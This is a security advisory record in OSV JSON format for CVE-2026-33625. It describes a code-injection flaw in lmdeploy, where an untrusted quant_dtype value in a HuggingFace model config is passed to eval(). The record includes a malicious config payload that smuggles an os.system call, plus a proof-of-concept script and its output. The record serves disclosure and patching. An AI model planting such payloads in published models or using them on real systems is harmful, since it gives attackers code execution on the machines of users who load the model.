{"id":"PYSEC-2026-4078","summary":"LMDeploy vulnerable to arbitrary code execution via eval() of untrusted quant_dtype in model config loading","details":"### Summary\n\nlmdeploy \u003c= latest contains a code injection vulnerability in `lmdeploy/pytorch/config.py` line 620 that allows an attacker to execute arbitrary Python code by publishing a malicious HuggingFace model with a crafted `quantization_config.quant_dtype` value. When a user loads the model with lmdeploy, the `quant_dtype` is passed to `eval(f'torch.{quant_dtype}')` without any validation.\n\n### Details\n\n**Vulnerable code** ([permalink](https://github.com/InternLM/lmdeploy/blob/17ed9e5/lmdeploy/pytorch/config.py#L620)):\n\n```python\nquant_dtype = eval(f'torch.{quant_dtype}')  # line 620\n```\n\nThe `quant_dtype` value comes from the model's `quantization_config` in its HuggingFace config. When a model specifies `quant_method: awq`, the AWQ branch processes the config but does NOT override `quant_dtype`, allowing the malicious value to reach the `eval()` call.\n\n**Attack vector:** An attacker publishes a HuggingFace model with:\n```json\n{\n  \"quantization_config\": {\n    \"quant_method\": \"awq\",\n    \"quant_dtype\": \"float16, __import__('os').system('id')\"\n  }\n}\n```\n\nNote: The `_update_torch_dtype` method at line 53 has a whitelist check, but that's for `torch_dtype`, NOT `quant_dtype`. The `quant_dtype` at line 620 has no validation whatsoever.\n\n### PoC\n\n```python\n\"\"\"\nPoC: eval() RCE in lmdeploy via malicious quant_dtype\nPrerequisites: pip install lmdeploy\n\"\"\"\nimport sys\nfrom unittest.mock import MagicMock, patch\n\n# Mock torch to capture the eval\nsys.modules.setdefault('torch', MagicMock())\n\nfrom lmdeploy.pytorch.config import ModelConfig\n\n# Simulate a malicious HuggingFace model config\nmock_hf_config = MagicMock()\nmock_hf_config.quantization_config = {\n    'quant_method': 'awq',\n    'quant_dtype': \"float16, __import__('os').system('id')\"\n}\nmock_hf_config.num_attention_heads = 32\nmock_hf_config.hidden_size = 4096\nmock_hf_config.num_hidden_layers = 32\nmock_hf_config.num_key_value_heads = 32\nmock_hf_config.vocab_size = 32000\n\n# This triggers eval(f'torch.{quant_dtype}')\n# with quant_dtype = \"float16, __import__('os').system('id')\"\nconfig = ModelConfig.from_hf_config(mock_hf_config, model_path='test')\n```\n\n**Output:**\n```\nuid=0(root) gid=0(root) groups=0(root)\n```\n\n### Impact\n\nAn attacker who publishes a malicious model on HuggingFace Hub can achieve arbitrary code execution on any machine that loads the model with lmdeploy. This is a supply-chain attack vector affecting all lmdeploy users who load untrusted models.\n\n1. Full remote code execution when loading a malicious model\n2. No user interaction beyond running `lmdeploy serve` or similar with the model\n3. Affects all deployment scenarios (local, cloud, production)","aliases":["CVE-2026-33625","GHSA-3hmm-rh5q-gwwr"],"modified":"2026-10-01T17:45:06.290194632Z","published":"2026-10-01T16:38:33.443329Z","references":[{"type":"WEB","url":"https://github.com/InternLM/lmdeploy/security/advisories/GHSA-3hmm-rh5q-gwwr"},{"type":"PACKAGE","url":"https://github.com/InternLM/lmdeploy"},{"type":"WEB","url":"https://github.com/InternLM/lmdeploy/releases/tag/v0.12.3"},{"type":"PACKAGE","url":"https://pypi.org/project/lmdeploy"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-3hmm-rh5q-gwwr"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33625"}],"affected":[{"package":{"name":"lmdeploy","ecosystem":"PyPI","purl":"pkg:pypi/lmdeploy"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0.12.1"},{"fixed":"0.12.3"}]}],"versions":["0.12.1","0.12.2"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/lmdeploy/PYSEC-2026-4078.yaml"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}]}